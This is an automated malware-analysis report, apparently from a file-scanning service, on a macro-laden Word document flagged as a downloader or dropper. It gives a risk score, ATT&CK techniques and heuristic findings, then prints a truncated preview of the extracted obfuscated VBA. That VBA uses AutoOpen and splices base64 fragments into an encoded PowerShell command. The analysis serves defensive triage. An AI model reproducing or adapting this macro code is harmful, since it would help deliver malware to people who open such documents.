MALICIOUS
244
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The sample contains VBA macros with an AutoOpen function, which is a common technique for executing malicious code upon opening the document. The critical heuristic 'OLE_VBA_SHELL' indicates the use of the Shell() function, strongly suggesting the execution of an external process. ClamAV also identified this as a dropper agent. No specific family could be identified, but the behavior points to a downloader.
Heuristics 8
-
ClamAV: Doc.Dropper.Agent-6362669-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6362669-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 45777 bytes |
SHA-256: 3def25ba7a34b4471b09788bc0d99f9f550df5f4fc67c30a0fa3feac30123f9c |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 62 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "BKAuzzSqw"
Function aWQFoVRQt()
klmPwTztw = wDjfMPCCR
LrQVmHGGNZr = Mid("oEADUALAAxADAAMQAsADEAMQAwACwAIAAxADEANgAsACAANQA5AjwPEYirL84NCnqoW6OZmz", 3, 49)
EDRRathwW = LrQVmHGGNZr
wjaudbYbE = PGWDavXQi
WCKhXtNMvJh = Mid("1A5ADkAIAAsACAAMQAwADgALAAgADEAMAA1ACAALAAxADAAMQAgACwAIAAxADEAMAAsADEAMQA2ACAALAAgADQANgAgACwANgA4ACAALAAgADE63BkqwWwBSNk1dGz1LhkiUTtJ24KTU3J65AW", 2, 109)
DUFWWEiv = WCKhXtNMvJh
kYkSRpSFZ = NjMuiWSwT
jHNlMhJolOV = Mid("D3iX8qO8JSCwAIAAzADYALAAxADEANqTfXv37Lzu9a0dLGzCwi", 11, 20)
SGkSPtXNF = jHNlMhJolOV
spIKrUOin = csdlHwlSd
BtkniWwqVU = Mid("Wa7WqcYqOv5MAOQAsADEAMAA0ACAALAAgADEAMQA2ACAALAAgADEAMQA2ACwAIAAxADEAMgAsADUAOAAsACmIdY1", 12, 72)
iJRaKVVopPw = BtkniWwqVU
jdPlbXBKu = rUbAldbib
CjRrLdvDLZV = Mid("ozjjkuZVBt4RQr9NAA3ACwANAA0ACwAMQAwADQAIAw2vPX96W2PtilLzqlzoiY", 16, 26)
fMiDV = CjRrLdvDLZV
WZjQEiBqN = wbZQJMslS
tkUAknTu = Mid("XlxADEAMAAgACwAIAAxADAAMQAsACAAMQAxADkALAAgADQANQAsADEAMQAxACAALAAgADkAOAAgACwAMQAwADYAIAAsADEAMAAxACAALAAgADkAOQAsACAAMQAxADYAIAAsACAAMwAyACAALAA4ADMALAAxADIAMQAgACwAIAAxADEANQAgACwAMQAxADYnWE8RoPN0u1P0l", 3, 188)
Lzqrn = tkUAknTu
EHNkJjaWO = LcGAJcUOs
scIDcpM = Mid("jLAA1ADgAIAAsADQANwAsADQANwAgACwAIAAxADAAMQAsADEAMAAwACwAIAAxADEAMQAsACAAMQAxADAAIAAsADEAMQAwACAALAAgADEAMAAxACAANUr0pEHw2A0b", 2, 112)
camiNRQzib = scIDcpM
zQZjjlKFj = VbKPIAKXX
ESlqOSUMvp = Mid("fmswQkANwAsACAAOQA5ACAALAAxADEANgAsADEAMAA1ACwAMQAxADEALAAxADEAMA9ObkVv0CTfbV", 6, 60)
ijDmJau = ESlqOSUMvp
OlQzphUqO = GwRwwuTuU
tafjcwhHaVA = Mid("0pHV879AAMQAwADEAIAAsADEAMQAyACAALAAgADEAMQA2ACwAIAAxADAANQAsADEAMQAxACAALAAgADEAMQAwACwAIAA0ADYALAA3ADcAIAAsADEAMAAxACAALAAgADEAMQA1ACAALAAxADAzVi", 8, 136)
hlKGvYrmCGZ = tafjcwhHaVA
sXYbaDzFv = DvUGplFGd
KCLGNtRwFJN = Mid("pfPQ3S1nlvfKmF4hnRMqh5SVUboOnRSDL5ECwAOQA3ACAALAAxADAAMAAsADcAMAAgACwAMQAwADUALAAgADEAMAA4ACwAIAAxADAAMQAgACwANAAwACwAIAAzADYALAAgADEAMQA3ACAALAAgADEAMQA0ACAALAAgADEAMAA4ACwAIAA0ADYALAA4ADQAIAAsACAAMQAxADEAIAAsACAAOAAzACAALAAxADEANRH", 36, 196)
BjmDNWljAzU = KCLGNtRwFJN
czbsLsWDJ = RZfPwNjSA
aWvvHSvLUmV = Mid("SXiUjmOjRBdu%=MZKhYjtAS&&!%aWQFoVRQt%!!%QjlQKlAWi%!!%KVuqSwjNW%! -e IAAmACAAKAAgACQAZQBuAHYAOgBQAFUAQgBsAEkAQwBbADEAMwBdACsAJABFAG4AdgA6AHAw2RK2m", 5, 135)
LiLifqkoKOA = aWvvHSvLUmV
zmKMCkmQu = uAGjqpRrz
qAkLV = Mid("ripjMjqmJXBIuKqCWAAgACwAOQA3ACwAMQAxADAAIAAsADEAMAAwACwAIAAxADEAMQAgACwAMQAwADkAIAAsADMAMgAgACwAIAA2ADEALAAzADIALAAxADEAMAAgACwAMQAwADEALAAxADEAOQAgACwANAA1ACAALNE", 18, 144)
vUtEZWsNk = qAkLV
tALfFXujf = QozGaXlFU
JDhzWi = Mid("bl1rC7pRI0AsADEAMQA2ACAALAAgADEAMQA2ACAALAAgADEAMQAyACwAIAA1AzX1U", 11, 51)
SmBGTZIWua = JDhzWi
TPvqGvzcC = ClipwEPmR
GWVCXHDmwlK = Mid("qzV51ADgALAAgADQANwAsADQANwAsACAAMQAwADkAIAAsACAAOQA3ACwAIAAxADEANAADXwHKdd", 5, 64)
NWoFVu = GWVCXHDmwlK
pThmRVEVc = vnajvkVzb
iiDAfiU = Mid("7mpUIMTDTr0wwPz40XAgADEAMQA0ACAALAAgADQANwAgACwAIAA0ADQALAAgADEAMAA0ACwAIAAxADEANgAgACwAMQAxADYALAAxADEAwBpXPf6j", 20, 85)
MCHGXEIW = iiDAfiU
BCuQhcUsv = zaqurnFwm
SfctwM = Mid("pBzAANAA3ACAALAAgADQANwAsADkANwAgACwAMQAwADMALAAgADEAMAAxACwAIAAxADEAMAAsACAAMQAxADYALAAxADEANQAgACwAMQAwADUALG7ZHsdFoQOYJzrpj4Y", 4, 107)
UznQdst = SfctwM
njwZlkSCp = cSqzUAdOk
vkXPr = Mid("lp0a9FPwkNWhLFAMQAxADQAIAAsACAAMQAwADgALAAgADMAMgAgACwAIAAxADAANQAsACAAMQAxADAALAAgADMAMgAgACwAIAAzADYALAEKmZwT", 15, 91)
czGUSZPSn = vkXPr
WYmESYaGu = lAwniwwiR
TnMzEJa = Mid("iiLAAgADMAMgAgACwAMQAxADQALAAgADkANwAgACwAMQAxADAALAAxADAAMAAsADEAMQAxACAALAAgADEAMAA5ACAALAA1ADkALAAgADMANgAgACwAIAAxADEANwAsACAAMQAxADQALAAgADEAMAA4ACwAMQAxADUAIAAsACAAMwAyACwAIAA2ADEALAAzADIAIAAsAD5ik8692k2M", 3, 198)
MtHsIOllWzX = TnMzEJa
ccQKzinsa = FAGqQdDjX
SESAEhoCwJ = Mid("Dr88oGRAsADMAOQAgACwAIAAzADIALAAgADQAMwAsADMAMgAgACwAMwA2ACwAMQAxADAALAA5ADcALAAxADAAOQAsADEAMAAxACwAIAAzADIALAA0ADMAIAAsADMAMgAsACAAMwA5ACwANAA2ACAALAAxADAAMQAsAC
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.